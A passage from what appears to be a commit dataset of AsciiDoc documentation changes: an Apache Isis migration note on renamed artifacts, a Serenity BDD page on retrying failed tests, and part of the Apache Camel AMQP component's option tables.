`IsisModuleApplibChangeAndExecutionLoggers`\n\n|===\n\n== Other\n\n=== Bill of Material \/ Parent POM\n\nFolder moved `\/isis-parent` -> `\/bom` \n\n[source, xml]\n.Bill of Material\n----\n<!-- renamed\n<groupId>org.apache.isis<\/groupId>\n<artifactId>isis-parent<\/artifactId>\n-->\n\n<groupId>org.apache.isis<\/groupId>\n<artifactId>isis-bom<\/artifactId>\n----\n\n=== Restclient\n\n[source, java]\n.Restclient Package Names\n----\n\/\/ renamed ...\n\/\/import org.apache.isis.extensions.restclient.RestfulClient;\n\/\/import org.apache.isis.extensions.restclient.RestfulClientConfig;\nimport org.apache.isis.viewer.restfulobjects.client.RestfulClient;\nimport org.apache.isis.viewer.restfulobjects.client.RestfulClientConfig;\n----\n\n[source, xml]\n.Restclient Artifacts\n----\n<!-- renamed\n<groupId>org.apache.isis.mappings<\/groupId>\n<artifactId>isis-mappings-restclient-applib<\/artifactId>\n-->\n\n<groupId>org.apache.isis.viewer<\/groupId>\n<artifactId>isis-viewer-restfulobjects-client<\/artifactId>\n----\n\n[source, java]\n.Restclient Usage\n----\n\/\/ DigestResponse is no longer publicly visible, instead returning Try<T> \n<T> Try<T> digest(Response response, Class<T> entityType);\n\n\/\/ DigestResponse is no longer publicly visible, instead returning Try<Can<T>>\n<T> Try<Can<T>> digestList(Response response, Class<T> entityType, GenericType<List<T>> genericType);\n----\n\n=== Mappings\n\n[source, xml]\n.Mappings\n----\n<!-- all removed\n<groupId>org.apache.isis.mappings<\/groupId>\n<artifactId>isis-mappings-...<\/artifactId>\n-->\n----\n\n=== Mavendeps\n\n[source, 
xml]\n.integtests\n----\n<!-- removed\n<groupId>org.apache.isis.mavendeps<\/groupId>\n<artifactId>isis-mavendeps-integtests<\/artifactId>\n<type>pom<\/type>\n-->\n\n<!-- instead use directly as required ... -->\n\n<groupId>org.apache.isis.testing<\/groupId>\n<artifactId>isis-testing-integtestsupport-applib<\/artifactId>\n\n<groupId>org.apache.isis.testing<\/groupId>\n<artifactId>isis-testing-fakedata-applib<\/artifactId>\n\n<groupId>org.apache.isis.testing<\/groupId>\n<artifactId>isis-testing-fixtures-applib<\/artifactId>\n----\n\n[source, xml]\n.unittests\n----\n<!-- removed\n<groupId>org.apache.isis.mavendeps<\/groupId>\n<artifactId>isis-mavendeps-unittests<\/artifactId>\n<type>pom<\/type>\n-->\n\n<!-- instead use directly as required ... -->\n\n<groupId>org.apache.isis.testing<\/groupId>\n<artifactId>isis-testing-unittestsupport-applib<\/artifactId>\n\n<groupId>org.apache.isis.testing<\/groupId>\n<artifactId>isis-testing-fakedata-applib<\/artifactId>\n----\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"19522665e48c1f2f0ffc30c9dbef830979a2136e","subject":"actualize Retrying failed tests docu","message":"actualize Retrying failed tests docu\n","repos":"serenity-bdd\/serenity-documentation,serenity-bdd\/serenity-documentation","old_file":"src\/asciidoc\/retry.adoc","new_file":"src\/asciidoc\/retry.adoc","new_contents":"Sometimes it is required to retry a failed test. For the JUnit tests, this can be achieved by setting the system property +test.retry.count+ to the maximum number of times you want the failed tests to be retried. All test methods will be executed until the first successful run, but not more than +test.retry.count+ times.\n\nFor the Cucumber tests, there is an equivalent property, +test.retry.count.cucumber+.\n\nHere is a short example; for it we will use the following test class:\n\n[source,java]\n----\ninclude::{srcdir}\/junit-retries\/net\/serenity\/samples\/retries\/SampleTest.java[]\n----\n\nSteps class:\n\n[source,java]\n----\ninclude::{srcdir}\/junit-retries\/net\/serenity\/samples\/retries\/TestSteps.java[]\n----\n\nIf this test is executed, it will fail:\n\n\n[[retry_test_fail]]\n.Report with failed scenario\nimage::retry_test_fail.png[]\n\nIf we set the property +test.retry.count=4+ in the serenity.properties file, the failing tests will be executed until they succeed or the maximum number of tries is reached.\n\nThe same test execution with the +test.retry.count+ property set will be successful, because the method +then_example_result_should_be+ fails only twice and the third execution succeeds:\n\n[[retry_test_fail]]\n.Report with successful unstable scenario\nimage::retry_test_success_unstable.png[]\n\nIf you're using Jenkins for aggregating your test results, use this folder pattern for JUnit test results:\n\n----\ntarget\/site\/serenity\/SERENITY-JUNIT-*.xml\n----\n\nThis will exclude the previous failed tests from your report.\n","old_contents":"
If +max.retries+ provided and +junit.retry.tests+=true, all method tests will be executed until first successful run, but not more than 1 + +max.retries+ times.\n\nHere is short example, for it we will use next test class:\n\n[source,java]\n----\ninclude::{srcdir}\/junit-retries\/net\/serenity\/samples\/retries\/SampleTest.java[]\n----\n\nSteps class:\n\n[source,java]\n----\ninclude::{srcdir}\/junit-retries\/net\/serenity\/samples\/retries\/TestSteps.java[]\n----\n\nIf this test will be executed - it will fail:\n\n\n[[retry_test_fail]]\n.Report with failed scenario\nimage::retry_test_fail.png[]\n\nIf we provide next properties in serenity.property file, framework will execute tests more according to configuration until test will be successful or number of tries will be reached:\n\n----\nmax.retries=4\njunit.retry.tests=true\n----\n\nAfter executing same test it will be successful - because method +then_example_result_should_be+ fails only twice, and third \"try\" will successful:\n\n\n[[retry_test_fail]]\n.Report with successful scenario\nimage::retry_test_success.png[]\n\nIf you're using Jenkins for aggregating your test results use this folder pattern for JUnit test results:\n\n----\ntarget\/site\/serenity\/SERENITY-JUNIT-*.xml\n----\n\nThis will exclude the previous failed tests from your report.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"15b58bcfd24d4a4cadb5eaa57086dc60395ef10b","subject":"Fix Typo AMQP protocol","message":"Fix Typo AMQP protocol\n","repos":"pmoerenhout\/camel,jamesnetherton\/camel,onders86\/camel,gnodet\/camel,dmvolod\/camel,dmvolod\/camel,tdiesler\/camel,anoordover\/camel,zregvart\/camel,curso007\/camel,nikhilvibhav\/camel,rmarting\/camel,pax95\/camel,nicolaferraro\/camel,jonmcewen\/camel,rmarting\/camel,pax95\/camel,akhettar\/camel,anoordover\/camel,jonmcewen\/camel,ullgren\/camel,zregvart\/camel,gnodet\/camel,onders86\/camel,gautric\/camel,onders86\/camel,tadayosi\/camel,snurmine\/camel,jonmcewen\/camel,pmoerenhout\/camel,nicolaferraro\/camel,onders86\/camel,snurmine\/camel,CodeSmell\/camel,curso007\/camel,apache\/camel,kevinearls\/camel,akhettar\/camel,tdiesler\/camel,dmvolod\/camel,DariusX\/camel,pmoerenhout\/camel,cunningt\/camel,alvinkwekel\/camel,pax95\/camel,adessaigne\/camel,alvinkwekel\/camel,gnodet\/camel,ullgren\/camel,jonmcewen\/camel,adessaigne\/camel,snurmine\/camel,objectiser\/camel,zregvart\/camel,ullgren\/camel,CodeSmell\/camel,davidkarlsen\/camel,tadayosi\/camel,gnodet\/camel,onders86\/camel,cunningt\/camel,tadayosi\/camel,akhettar\/camel,rmarting\/camel,tdiesler\/camel,CodeSmell\/camel,nikhilvibhav\/camel,punkhorn\/camel-upstream,cunningt\/camel,sverkera\/camel,gautric\/camel,Fabryprog\/camel,Fabryprog\/camel,apache\/camel,kevinearls\/camel,zregvart\/camel,adessaigne\/camel,dmvolod\/camel,cunningt\/camel,christophd\/camel,kevinearls\/camel,rmarting\/camel,nikhilvibhav\/camel,DariusX\/camel,christophd\/camel,christophd\/camel,Fabryprog\/camel,mcollovati\/camel,davidkarlsen\/camel,christophd\/camel,alvinkwekel\/camel,snurmine\/camel,kevinearls\/camel,curso007\/camel,alvinkwekel\/camel,sverkera\/camel,adessaigne\/camel,mcollovati\/camel,tadayosi\/camel,pmoerenhout\/camel,cunningt\/camel,anoordover\/camel,tdiesler\/camel,sverkera\/camel,apache\/camel,jonmcewen\/camel,tdiesler\/camel,apache\/camel,gautric\/camel,pax95\/camel,pax95\/camel,akhettar\/camel,apache\/camel,anoordover\/camel,tadayosi\/camel,objectiser\/camel,jamesnetherton\/camel,DariusX\/camel,tadayosi\/camel,snurmine\/camel,adessaigne\/camel,rmarting\/
camel,DariusX\/camel,gautric\/camel,gnodet\/camel,adessaigne\/camel,sverkera\/camel,akhettar\/camel,rmarting\/camel,jamesnetherton\/camel,kevinearls\/camel,sverkera\/camel,curso007\/camel,jamesnetherton\/camel,nikhilvibhav\/camel,dmvolod\/camel,apache\/camel,mcollovati\/camel,punkhorn\/camel-upstream,Fabryprog\/camel,nicolaferraro\/camel,sverkera\/camel,kevinearls\/camel,christophd\/camel,tdiesler\/camel,christophd\/camel,objectiser\/camel,ullgren\/camel,snurmine\/camel,CodeSmell\/camel,pmoerenhout\/camel,anoordover\/camel,gautric\/camel,punkhorn\/camel-upstream,pmoerenhout\/camel,gautric\/camel,jamesnetherton\/camel,akhettar\/camel,cunningt\/camel,davidkarlsen\/camel,objectiser\/camel,pax95\/camel,curso007\/camel,nicolaferraro\/camel,jonmcewen\/camel,jamesnetherton\/camel,mcollovati\/camel,punkhorn\/camel-upstream,onders86\/camel,anoordover\/camel,curso007\/camel,davidkarlsen\/camel,dmvolod\/camel","old_file":"components\/camel-amqp\/src\/main\/docs\/amqp-component.adoc","new_file":"components\/camel-amqp\/src\/main\/docs\/amqp-component.adoc","new_contents":"[[amqp-component]]\n== AMQP Component\n\n*Available as of Camel version 1.2*\n\nThe *amqp:* component supports the http:\/\/www.amqp.org\/[AMQP 1.0\nprotocol] using the JMS Client API of the http:\/\/qpid.apache.org\/[Qpid]\nproject. In case you want to use AMQP 0.9 (in particular RabbitMQ) you\nmight also be interested in the <<rabbitmq-component,Camel RabbitMQ>>\ncomponent. Please keep in mind that prior to the Camel 2.17.0 AMQP\ncomponent supported AMQP 0.9 and above, however since Camel 2.17.0 it\nsupports only AMQP 1.0.\n\nMaven users will need to add the following dependency to their `pom.xml`\nfor this component:\n\n[source,xml]\n------------------------------------------------------------------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-amqp<\/artifactId>\n <version>${camel.version}<\/version> <!-- use the same version as your Camel core version -->\n<\/dependency>\n------------------------------------------------------------------------------------------------\n\n### URI format\n\n[source,java]\n---------------------------------------------\namqp:[queue:|topic:]destinationName[?options]\n---------------------------------------------\n\n### AMQP Options\n\nYou can specify all of the various configuration options of the\nlink:..\/..\/..\/..\/camel-jms\/src\/main\/docs\/readme.html[JMS] component after the destination name.\n\n\n\n\n\/\/ component options: START\nThe AMQP component supports 79 options which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *configuration* (advanced) | To use a shared JMS configuration | | JmsConfiguration\n| *acceptMessagesWhile Stopping* (consumer) | Specifies whether the consumer accept messages while it is stopping. You may consider enabling this option, if you start and stop JMS routes at runtime, while there are still messages enqueued on the queue. If this option is false, and you stop the JMS route, then messages may be rejected, and the JMS broker would have to attempt redeliveries, which yet again may be rejected, and eventually the message may be moved at a dead letter queue on the JMS broker. To avoid this its recommended to enable this option. 
| false | boolean\n| *allowReplyManagerQuick Stop* (consumer) | Whether the DefaultMessageListenerContainer used in the reply managers for request-reply messaging allow the DefaultMessageListenerContainer.runningAllowed flag to quick stop in case JmsConfigurationisAcceptMessagesWhileStopping is enabled, and org.apache.camel.CamelContext is currently being stopped. This quick stop ability is enabled by default in the regular JMS consumers but to enable for reply managers you must enable this flag. | false | boolean\n| *acknowledgementMode* (consumer) | The JMS acknowledgement mode defined as an Integer. Allows you to set vendor-specific extensions to the acknowledgment mode.For the regular modes, it is preferable to use the acknowledgementModeName instead. | | int\n| *eagerLoadingOf Properties* (consumer) | Enables eager loading of JMS properties as soon as a message is loaded which generally is inefficient as the JMS properties may not be required but sometimes can catch early any issues with the underlying JMS provider and the use of JMS properties | false | boolean\n| *acknowledgementModeName* (consumer) | The JMS acknowledgement name, which is one of: SESSION_TRANSACTED, CLIENT_ACKNOWLEDGE, AUTO_ACKNOWLEDGE, DUPS_OK_ACKNOWLEDGE | AUTO_ ACKNOWLEDGE | String\n| *autoStartup* (consumer) | Specifies whether the consumer container should auto-startup. | true | boolean\n| *cacheLevel* (consumer) | Sets the cache level by ID for the underlying JMS resources. See cacheLevelName option for more details. | | int\n| *cacheLevelName* (consumer) | Sets the cache level by name for the underlying JMS resources. Possible values are: CACHE_AUTO, CACHE_CONNECTION, CACHE_CONSUMER, CACHE_NONE, and CACHE_SESSION. The default setting is CACHE_AUTO. See the Spring documentation and Transactions Cache Levels for more information. | CACHE_AUTO | String\n| *replyToCacheLevelName* (producer) | Sets the cache level by name for the reply consumer when doing request\/reply over JMS. This option only applies when using fixed reply queues (not temporary). Camel will by default use: CACHE_CONSUMER for exclusive or shared w\/ replyToSelectorName. And CACHE_SESSION for shared without replyToSelectorName. Some JMS brokers such as IBM WebSphere may require to set the replyToCacheLevelName=CACHE_NONE to work. Note: If using temporary queues then CACHE_NONE is not allowed, and you must use a higher value such as CACHE_CONSUMER or CACHE_SESSION. | | String\n| *clientId* (common) | Sets the JMS client ID to use. Note that this value, if specified, must be unique and can only be used by a single JMS connection instance. It is typically only required for durable topic subscriptions. If using Apache ActiveMQ you may prefer to use Virtual Topics instead. | | String\n| *concurrentConsumers* (consumer) | Specifies the default number of concurrent consumers when consuming from JMS (not for request\/reply over JMS). See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. When doing request\/reply over JMS then the option replyToConcurrentConsumers is used to control number of concurrent consumers on the reply message listener. | 1 | int\n| *replyToConcurrent Consumers* (producer) | Specifies the default number of concurrent consumers when doing request\/reply over JMS. See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. | 1 | int\n| *connectionFactory* (common) | The connection factory to be use. 
A connection factory must be configured either on the component or endpoint. | | ConnectionFactory\n| *username* (security) | Username to use with the ConnectionFactory. You can also configure username\/password directly on the ConnectionFactory. | | String\n| *password* (security) | Password to use with the ConnectionFactory. You can also configure username\/password directly on the ConnectionFactory. | | String\n| *deliveryPersistent* (producer) | Specifies whether persistent delivery is used by default. | true | boolean\n| *deliveryMode* (producer) | Specifies the delivery mode to be used. Possibles values are those defined by javax.jms.DeliveryMode. NON_PERSISTENT = 1 and PERSISTENT = 2. | | Integer\n| *durableSubscriptionName* (common) | The durable subscriber name for specifying durable topic subscriptions. The clientId option must be configured as well. | | String\n| *exceptionListener* (advanced) | Specifies the JMS Exception Listener that is to be notified of any underlying JMS exceptions. | | ExceptionListener\n| *errorHandler* (advanced) | Specifies a org.springframework.util.ErrorHandler to be invoked in case of any uncaught exceptions thrown while processing a Message. By default these exceptions will be logged at the WARN level, if no errorHandler has been configured. You can configure logging level and whether stack traces should be logged using errorHandlerLoggingLevel and errorHandlerLogStackTrace options. This makes it much easier to configure, than having to code a custom errorHandler. | | ErrorHandler\n| *errorHandlerLogging Level* (logging) | Allows to configure the default errorHandler logging level for logging uncaught exceptions. | WARN | LoggingLevel\n| *errorHandlerLogStack Trace* (logging) | Allows to control whether stacktraces should be logged or not, by the default errorHandler. | true | boolean\n| *explicitQosEnabled* (producer) | Set if the deliveryMode, priority or timeToLive qualities of service should be used when sending messages. This option is based on Spring's JmsTemplate. The deliveryMode, priority and timeToLive options are applied to the current endpoint. This contrasts with the preserveMessageQos option, which operates at message granularity, reading QoS properties exclusively from the Camel In message headers. | false | boolean\n| *exposeListenerSession* (consumer) | Specifies whether the listener session should be exposed when consuming messages. | false | boolean\n| *idleTaskExecutionLimit* (advanced) | Specifies the limit for idle executions of a receive task, not having received any message within its execution. If this limit is reached, the task will shut down and leave receiving to other executing tasks (in the case of dynamic scheduling; see the maxConcurrentConsumers setting). There is additional doc available from Spring. | 1 | int\n| *idleConsumerLimit* (advanced) | Specify the limit for the number of consumers that are allowed to be idle at any given time. | 1 | int\n| *maxConcurrentConsumers* (consumer) | Specifies the maximum number of concurrent consumers when consuming from JMS (not for request\/reply over JMS). See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. When doing request\/reply over JMS then the option replyToMaxConcurrentConsumers is used to control number of concurrent consumers on the reply message listener. | | int\n| *replyToMaxConcurrent Consumers* (producer) | Specifies the maximum number of concurrent consumers when using request\/reply over JMS. 
See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. | | int\n| *replyOnTimeoutToMax ConcurrentConsumers* (producer) | Specifies the maximum number of concurrent consumers for continue routing when timeout occurred when using request\/reply over JMS. | 1 | int\n| *maxMessagesPerTask* (advanced) | The number of messages per task. -1 is unlimited. If you use a range for concurrent consumers (eg min max), then this option can be used to set a value to eg 100 to control how fast the consumers will shrink when less work is required. | -1 | int\n| *messageConverter* (advanced) | To use a custom Spring org.springframework.jms.support.converter.MessageConverter so you can be in control how to map to\/from a javax.jms.Message. | | MessageConverter\n| *mapJmsMessage* (advanced) | Specifies whether Camel should auto map the received JMS message to a suited payload type, such as javax.jms.TextMessage to a String etc. | true | boolean\n| *messageIdEnabled* (advanced) | When sending, specifies whether message IDs should be added. This is just an hint to the JMS broker.If the JMS provider accepts this hint, these messages must have the message ID set to null; if the provider ignores the hint, the message ID must be set to its normal unique value | true | boolean\n| *messageTimestampEnabled* (advanced) | Specifies whether timestamps should be enabled by default on sending messages. This is just an hint to the JMS broker.If the JMS provider accepts this hint, these messages must have the timestamp set to zero; if the provider ignores the hint the timestamp must be set to its normal value | true | boolean\n| *alwaysCopyMessage* (producer) | If true, Camel will always make a JMS message copy of the message when it is passed to the producer for sending. Copying the message is needed in some situations, such as when a replyToDestinationSelectorName is set (incidentally, Camel will set the alwaysCopyMessage option to true, if a replyToDestinationSelectorName is set) | false | boolean\n| *useMessageIDAs CorrelationID* (advanced) | Specifies whether JMSMessageID should always be used as JMSCorrelationID for InOut messages. | false | boolean\n| *priority* (producer) | Values greater than 1 specify the message priority when sending (where 0 is the lowest priority and 9 is the highest). The explicitQosEnabled option must also be enabled in order for this option to have any effect. | 4 | int\n| *pubSubNoLocal* (advanced) | Specifies whether to inhibit the delivery of messages published by its own connection. | false | boolean\n| *receiveTimeout* (advanced) | The timeout for receiving messages (in milliseconds). | 1000 | long\n| *recoveryInterval* (advanced) | Specifies the interval between recovery attempts, i.e. when a connection is being refreshed, in milliseconds. The default is 5000 ms, that is, 5 seconds. | 5000 | long\n| *taskExecutor* (consumer) | Allows you to specify a custom task executor for consuming messages. | | TaskExecutor\n| *timeToLive* (producer) | When sending messages, specifies the time-to-live of the message (in milliseconds). | -1 | long\n| *transacted* (transaction) | Specifies whether to use transacted mode | false | boolean\n| *lazyCreateTransaction Manager* (transaction) | If true, Camel will create a JmsTransactionManager, if there is no transactionManager injected when option transacted=true. | true | boolean\n| *transactionManager* (transaction) | The Spring transaction manager to use. 
| | PlatformTransaction Manager\n| *transactionName* (transaction) | The name of the transaction to use. | | String\n| *transactionTimeout* (transaction) | The timeout value of the transaction (in seconds), if using transacted mode. | -1 | int\n| *testConnectionOn Startup* (common) | Specifies whether to test the connection on startup. This ensures that when Camel starts that all the JMS consumers have a valid connection to the JMS broker. If a connection cannot be granted then Camel throws an exception on startup. This ensures that Camel is not started with failed connections. The JMS producers is tested as well. | false | boolean\n| *asyncStartListener* (advanced) | Whether to startup the JmsConsumer message listener asynchronously, when starting a route. For example if a JmsConsumer cannot get a connection to a remote JMS broker, then it may block while retrying and\/or failover. This will cause Camel to block while starting routes. By setting this option to true, you will let routes startup, while the JmsConsumer connects to the JMS broker using a dedicated thread in asynchronous mode. If this option is used, then beware that if the connection could not be established, then an exception is logged at WARN level, and the consumer will not be able to receive messages; You can then restart the route to retry. | false | boolean\n| *asyncStopListener* (advanced) | Whether to stop the JmsConsumer message listener asynchronously, when stopping a route. | false | boolean\n| *forceSendOriginal Message* (producer) | When using mapJmsMessage=false Camel will create a new JMS message to send to a new JMS destination if you touch the headers (get or set) during the route. Set this option to true to force Camel to send the original JMS message that was received. | false | boolean\n| *requestTimeout* (producer) | The timeout for waiting for a reply when using the InOut Exchange Pattern (in milliseconds). The default is 20 seconds. You can include the header CamelJmsRequestTimeout to override this endpoint configured timeout value, and thus have per message individual timeout values. See also the requestTimeoutCheckerInterval option. | 20000 | long\n| *requestTimeoutChecker Interval* (advanced) | Configures how often Camel should check for timed out Exchanges when doing request\/reply over JMS. By default Camel checks once per second. But if you must react faster when a timeout occurs, then you can lower this interval, to check more frequently. The timeout is determined by the option requestTimeout. | 1000 | long\n| *transferExchange* (advanced) | You can transfer the exchange over the wire instead of just the body and headers. The following fields are transferred: In body, Out body, Fault body, In headers, Out headers, Fault headers, exchange properties, exchange exception. This requires that the objects are serializable. Camel will exclude any non-serializable objects and log it at WARN level. You must enable this option on both the producer and consumer side, so Camel knows the payloads is an Exchange and not a regular payload. | false | boolean\n| *transferException* (advanced) | If enabled and you are using Request Reply messaging (InOut) and an Exchange failed on the consumer side, then the caused Exception will be send back in response as a javax.jms.ObjectMessage. If the client is Camel, the returned Exception is rethrown. This allows you to use Camel JMS as a bridge in your routing - for example, using persistent queues to enable robust routing. 
Notice that if you also have transferExchange enabled, this option takes precedence. The caught exception is required to be serializable. The original Exception on the consumer side can be wrapped in an outer exception such as org.apache.camel.RuntimeCamelException when returned to the producer. | false | boolean\n| *transferFault* (advanced) | If enabled and you are using Request Reply messaging (InOut) and an Exchange failed with a SOAP fault (not exception) on the consumer side, then the fault flag on MessageisFault() will be send back in the response as a JMS header with the key org.apache.camel.component.jms.JmsConstantsJMS_TRANSFER_FAULTJMS_TRANSFER_FAULT. If the client is Camel, the returned fault flag will be set on the link org.apache.camel.MessagesetFault(boolean). You may want to enable this when using Camel components that support faults such as SOAP based such as cxf or spring-ws. | false | boolean\n| *jmsOperations* (advanced) | Allows you to use your own implementation of the org.springframework.jms.core.JmsOperations interface. Camel uses JmsTemplate as default. Can be used for testing purpose, but not used much as stated in the spring API docs. | | JmsOperations\n| *destinationResolver* (advanced) | A pluggable org.springframework.jms.support.destination.DestinationResolver that allows you to use your own resolver (for example, to lookup the real destination in a JNDI registry). | | DestinationResolver\n| *replyToType* (producer) | Allows for explicitly specifying which kind of strategy to use for replyTo queues when doing request\/reply over JMS. Possible values are: Temporary, Shared, or Exclusive. By default Camel will use temporary queues. However if replyTo has been configured, then Shared is used by default. This option allows you to use exclusive queues instead of shared ones. See Camel JMS documentation for more details, and especially the notes about the implications if running in a clustered environment, and the fact that Shared reply queues has lower performance than its alternatives Temporary and Exclusive. | | ReplyToType\n| *preserveMessageQos* (producer) | Set to true, if you want to send message using the QoS settings specified on the message, instead of the QoS settings on the JMS endpoint. The following three headers are considered JMSPriority, JMSDeliveryMode, and JMSExpiration. You can provide all or only some of them. If not provided, Camel will fall back to use the values from the endpoint instead. So, when using this option, the headers override the values from the endpoint. The explicitQosEnabled option, by contrast, will only use options set on the endpoint, and not values from the message header. | false | boolean\n| *asyncConsumer* (consumer) | Whether the JmsConsumer processes the Exchange asynchronously. If enabled then the JmsConsumer may pickup the next message from the JMS queue, while the previous message is being processed asynchronously (by the Asynchronous Routing Engine). This means that messages may be processed not 100% strictly in order. If disabled (as default) then the Exchange is fully processed before the JmsConsumer will pickup the next message from the JMS queue. Note if transacted has been enabled, then asyncConsumer=true does not run asynchronously, as transaction must be executed synchronously (Camel 3.0 may support async transactions). | false | boolean\n| *allowNullBody* (producer) | Whether to allow sending messages with no body. If this option is false and the message body is null, then an JMSException is thrown. 
| true | boolean\n| *includeSentJMS MessageID* (producer) | Only applicable when sending to JMS destination using InOnly (eg fire and forget). Enabling this option will enrich the Camel Exchange with the actual JMSMessageID that was used by the JMS client when the message was sent to the JMS destination. | false | boolean\n| *includeAllJMSX Properties* (advanced) | Whether to include all JMSXxxx properties when mapping from JMS to Camel Message. Setting this to true will include properties such as JMSXAppID, and JMSXUserID etc. Note: If you are using a custom headerFilterStrategy then this option does not apply. | false | boolean\n| *defaultTaskExecutor Type* (consumer) | Specifies what default TaskExecutor type to use in the DefaultMessageListenerContainer, for both consumer endpoints and the ReplyTo consumer of producer endpoints. Possible values: SimpleAsync (uses Spring's SimpleAsyncTaskExecutor) or ThreadPool (uses Spring's ThreadPoolTaskExecutor with optimal values - cached threadpool-like). If not set, it defaults to the previous behaviour, which uses a cached thread pool for consumer endpoints and SimpleAsync for reply consumers. The use of ThreadPool is recommended to reduce thread trash in elastic configurations with dynamically increasing and decreasing concurrent consumers. | | DefaultTaskExecutor Type\n| *jmsKeyFormatStrategy* (advanced) | Pluggable strategy for encoding and decoding JMS keys so they can be compliant with the JMS specification. Camel provides two implementations out of the box: default and passthrough. The default strategy will safely marshal dots and hyphens (. and -). The passthrough strategy leaves the key as is. Can be used for JMS brokers which do not care whether JMS header keys contain illegal characters. You can provide your own implementation of the org.apache.camel.component.jms.JmsKeyFormatStrategy and refer to it using the notation. | | JmsKeyFormatStrategy\n| *allowAdditionalHeaders* (producer) | This option is used to allow additional headers which may have values that are invalid according to JMS specification. For example some message systems such as WMQ do this with header names using prefix JMS_IBM_MQMD_ containing values with byte array or other invalid types. You can specify multiple header names separated by comma, and use as suffix for wildcard matching. | | String\n| *queueBrowseStrategy* (advanced) | To use a custom QueueBrowseStrategy when browsing queues | | QueueBrowseStrategy\n| *messageCreatedStrategy* (advanced) | To use the given MessageCreatedStrategy which are invoked when Camel creates new instances of javax.jms.Message objects when Camel is sending a JMS message. | | MessageCreatedStrategy\n| *waitForProvision CorrelationToBeUpdated Counter* (advanced) | Number of times to wait for provisional correlation id to be updated to the actual correlation id when doing request\/reply over JMS and when the option useMessageIDAsCorrelationID is enabled. | 50 | int\n| *waitForProvision CorrelationToBeUpdated ThreadSleepingTime* (advanced) | Interval in millis to sleep each time while waiting for provisional correlation id to be updated. | 100 | long\n| *correlationProperty* (producer) | Use this JMS property to correlate messages in InOut exchange pattern (request-reply) instead of JMSCorrelationID property. This allows you to exchange messages with systems that do not correlate messages using JMSCorrelationID JMS property. If used JMSCorrelationID will not be used or set by Camel. 
The value of here named property will be generated if not supplied in the header of the message under the same name. | | String\n| *subscriptionDurable* (consumer) | Set whether to make the subscription durable. The durable subscription name to be used can be specified through the subscriptionName property. Default is false. Set this to true to register a durable subscription, typically in combination with a subscriptionName value (unless your message listener class name is good enough as subscription name). Only makes sense when listening to a topic (pub-sub domain), therefore this method switches the pubSubDomain flag as well. | false | boolean\n| *subscriptionShared* (consumer) | Set whether to make the subscription shared. The shared subscription name to be used can be specified through the subscriptionName property. Default is false. Set this to true to register a shared subscription, typically in combination with a subscriptionName value (unless your message listener class name is good enough as subscription name). Note that shared subscriptions may also be durable, so this flag can (and often will) be combined with subscriptionDurable as well. Only makes sense when listening to a topic (pub-sub domain), therefore this method switches the pubSubDomain flag as well. Requires a JMS 2.0 compatible message broker. | false | boolean\n| *subscriptionName* (consumer) | Set the name of a subscription to create. To be applied in case of a topic (pub-sub domain) with a shared or durable subscription. The subscription name needs to be unique within this client's JMS client id. Default is the class name of the specified message listener. Note: Only 1 concurrent consumer (which is the default of this message listener container) is allowed for each subscription, except for a shared subscription (which requires JMS 2.0). | | String\n| *streamMessageType Enabled* (producer) | Sets whether StreamMessage type is enabled or not. Message payloads of streaming kind such as files, InputStream, etc will either by sent as BytesMessage or StreamMessage. This option controls which kind will be used. By default BytesMessage is used which enforces the entire message payload to be read into memory. By enabling this option the message payload is read into memory in chunks and each chunk is then written to the StreamMessage until no more data. | false | boolean\n| *headerFilterStrategy* (filter) | To use a custom org.apache.camel.spi.HeaderFilterStrategy to filter header to and from Camel message. | | HeaderFilterStrategy\n| *resolveProperty Placeholders* (advanced) | Whether the component should resolve property placeholders on itself when starting. Only properties which are of String type can use property placeholders. | true | boolean\n|===\n\/\/ component options: END\n\n\n\n\n\n\n\n\/\/ endpoint options: START\nThe AMQP endpoint is configured using URI syntax:\n\n----\namqp:destinationType:destinationName\n----\n\nwith the following path and query parameters:\n\n==== Path Parameters (2 parameters):\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *destinationType* | The kind of destination to use | queue | String\n| *destinationName* | *Required* Name of the queue or topic to use as destination | | String\n|===\n\n==== Query Parameters (90 parameters):\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *clientId* (common) | Sets the JMS client ID to use. 
Note that this value, if specified, must be unique and can only be used by a single JMS connection instance. It is typically only required for durable topic subscriptions. If using Apache ActiveMQ you may prefer to use Virtual Topics instead. | | String\n| *connectionFactory* (common) | The connection factory to be use. A connection factory must be configured either on the component or endpoint. | | ConnectionFactory\n| *disableReplyTo* (common) | Specifies whether Camel ignores the JMSReplyTo header in messages. If true, Camel does not send a reply back to the destination specified in the JMSReplyTo header. You can use this option if you want Camel to consume from a route and you do not want Camel to automatically send back a reply message because another component in your code handles the reply message. You can also use this option if you want to use Camel as a proxy between different message brokers and you want to route message from one system to another. | false | boolean\n| *durableSubscriptionName* (common) | The durable subscriber name for specifying durable topic subscriptions. The clientId option must be configured as well. | | String\n| *jmsMessageType* (common) | Allows you to force the use of a specific javax.jms.Message implementation for sending JMS messages. Possible values are: Bytes, Map, Object, Stream, Text. By default, Camel would determine which JMS message type to use from the In body type. This option allows you to specify it. | | JmsMessageType\n| *testConnectionOnStartup* (common) | Specifies whether to test the connection on startup. This ensures that when Camel starts that all the JMS consumers have a valid connection to the JMS broker. If a connection cannot be granted then Camel throws an exception on startup. This ensures that Camel is not started with failed connections. The JMS producers is tested as well. | false | boolean\n| *acknowledgementModeName* (consumer) | The JMS acknowledgement name, which is one of: SESSION_TRANSACTED, CLIENT_ACKNOWLEDGE, AUTO_ACKNOWLEDGE, DUPS_OK_ACKNOWLEDGE | AUTO_ ACKNOWLEDGE | String\n| *asyncConsumer* (consumer) | Whether the JmsConsumer processes the Exchange asynchronously. If enabled then the JmsConsumer may pickup the next message from the JMS queue, while the previous message is being processed asynchronously (by the Asynchronous Routing Engine). This means that messages may be processed not 100% strictly in order. If disabled (as default) then the Exchange is fully processed before the JmsConsumer will pickup the next message from the JMS queue. Note if transacted has been 